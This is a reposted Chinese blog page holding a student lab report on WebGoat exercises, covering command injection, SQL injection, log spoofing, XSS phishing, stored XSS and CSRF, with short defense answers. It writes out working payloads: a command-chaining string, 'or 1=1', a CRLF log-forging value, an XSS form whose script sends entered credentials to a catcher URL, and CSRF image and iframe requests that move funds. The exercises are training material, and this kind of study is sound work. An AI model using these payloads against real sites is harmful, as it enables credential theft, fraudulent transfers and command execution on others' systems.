WEB安全基础入门—操作系统命令注入(shell 注入)

Posted Eason_LYC

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WEB安全基础入门—操作系统命令注入(shell 注入)相关的知识,希望对你有一定的参考价值。

欢迎关注订阅专栏!
WEB安全系列包括如下三个专栏:

  • 《WEB安全基础-服务器端漏洞》
  • 《WEB安全基础-客户端漏洞》
  • 《WEB安全高级-综合利用》

知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路!
欢迎关注订阅专栏!

  • 专栏文章追求对知识点的全面总结,逻辑严密,方便学习掌握。力求做到看完一篇文章,掌握一类漏洞知识。让读者简洁高效的掌握WEB安全知识框架,推开入门深造的大门。
  • 绝不为了追求文章数量,彰显内容丰富而故意拆散相关知识点。避免读者沉迷在无尽的技巧中而迷失进阶的道路!本系列的目标是授之以渔,而不仅仅是技巧的堆砌。
  • 每篇文章均配有大量靶场,点击文章中靶场名即可跳转练习(靶场在网站注册即可免费使用)。
  • 欢迎订阅专栏!建议学完两个基础专栏,再学习高级哦~

WEB安全基础入门—操作系统命令注入(shell 注入)

Exp9 Web安全基础

一、实验目标

理解和应用常用网络攻击技术的基本原理。

二、实验步骤

(一)SQL注入攻击

1.命令注入:Command Injection

 

原理:命令注入是通过在应用中执行宿主操作系统的命令,来达到破坏目的的一种攻击方式。如果我们的应用程序将不安全的用户输入传递给了系统命令解析器(shell),那么命令攻击就有可能发生。

步骤:

选中 Injection Flaws->Command Injection->inspect Element,右键选中inspect Elemnet,对图示的代码进行修改,在"helpfile"后添加"& netstat -an & ipconfig"。

点击view,查看命令执行结果,可以看到攻击成功,能够看到攻击方与被攻击方建立了连接。

 

 

2.数字型注入:Numeric SQL Injection

原理:当我们的Web app在向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么恶意访问者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。

步骤:

选中Injection Flaws->Numeric SQL Injectio->inspect Element,对源代码value="101"修改,在101后面添加or 1=1。

or 1=1是返回正确的意思,能够使语句永真。

 

 

3.日志欺骗:Log Spoofing

 原理:向日志添加虚假信息或插入脚本,管理员通过浏览器观看日志时恶意脚本会被执行。

步骤:

选择Injection Flaws->Log Spoofing,在User Name中输入webgoat%0d%0aLogin Succeeded for username: admin

随意输入密码后点击Login,可以看到webgoat登陆失败了,而admin登陆成功了。

 

 

(二)XSS攻击

 

1.XSS 钓鱼:Phishing with XSS

原理:创建一个表单,让受害者填写用户名和密码信息,然后会截取用户信息提交到webgoat上去。

步骤:

在搜索框中输入XSS攻击代码,代码如下:

 

</form>
<script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

 

在搜索框中输入攻击代码后点击Search,出现要输入用户名密码的表单,输入用户名密码,显示攻击成功。

 

 

 

 

2.Stored XSS Attacks(存储型XSS攻击)

原理:攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。

步骤:

在Title中随意输入,在message中输入攻击代码<script>alert("lxm attack succeed!");</script>,点击Submit,攻击成功。

 

(三)CSRF攻击

1.Cross Site Request Forgery

原理:写一个URL诱使其他用户点击,从而触发CSRF攻击,以图片的的形式将URL放进Message框,当用户点击图片,就会触发CSRF。

步骤:

 

在message框中输入代码<img src="http://localhost:8080/WebGoat/attack?Screen=325&menu=900&transferFunds=4301"/>,在页面右侧一栏可以看到Screen=324&menu=900。点击Submit后,可以看到转走用户4000元的信息,实现CSRF攻击。

 

 

2.CSRF Prompt By-Pass

原理:与1类似,构造CSRF攻击,其包括两个请求,一是转账请求,二是确认转账成功请求。需要额外传递两个参数给服务器(transferFunds=5000, transferFunds=CONFIRM)

步骤:

 

在message中输入以下代码:

<iframe src="attack?Screen=280&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=280&menu=900&transferFunds=CONFIRM"> </iframe

攻击成功。

 

 

 

三、实验思考与体会

(一)基础问题回答

(1)SQL注入攻击原理,如何防御

原理:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。

如何防御:对代码进行处理,使用正则表达式过滤传入的参数,对一些包含sql注入的关键字进行过滤;采用字符串过滤;jsp中调用该函数检查是否包含非法字符。

(2)XSS攻击的原理,如何防御

原理:黑客通过HTML注入篡改网页,插入恶意脚本,即代码注入,XSS攻击允许恶意用户将代码注入到网页上,并能够被浏览器成功的执行,获取目标攻击网站cookie,使其他用户受到影响。

如何防御:在表单提交或者url参数传递前,对需要的参数进行过滤;检查用户输入的内容中是否有非法内容。

(3)CSRF攻击原理,如何防御

原理:攻击者盗用了用户的身份,以用户的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作。

如何防御:输入验证码来检测用户;在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token。

(二)实验体会

此次实验模拟了网络攻击的几种形式,可以看到在网站建设上要尽量的防止出现漏洞,以防被黑客所利用。

 

以上是关于WEB安全基础入门—操作系统命令注入(shell 注入)的主要内容,如果未能解决你的问题,请参考以下文章

Exp9 Web安全基础

安全性测试入门:Command Injection命令行注入攻击和防御

WEB安全_基础入门_系统及数据库,明确安全测试思路(演示只需要熟悉流程)

XXE漏洞中DOCTYPEENTITY傻傻分不清-WEB安全基础入门—XML外部实体注入(XXE)

Web安全入门(ACCESS手工注入)

Exp9 Web安全基础